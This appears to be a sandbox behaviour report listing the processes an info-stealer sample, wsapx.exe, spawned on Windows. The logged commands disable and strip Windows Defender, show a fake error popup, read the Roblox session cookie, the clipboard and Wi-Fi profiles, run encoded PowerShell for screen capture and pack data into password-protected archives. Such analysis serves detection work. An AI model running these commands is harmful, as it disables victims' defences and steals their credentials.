              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Users\user\Desktop\wsapx.exe "C:\Users\user\Desktop\wsapx.exe"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\uses4c50\CSCF61F15A833E5414089F1F2D7C06D86CA.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
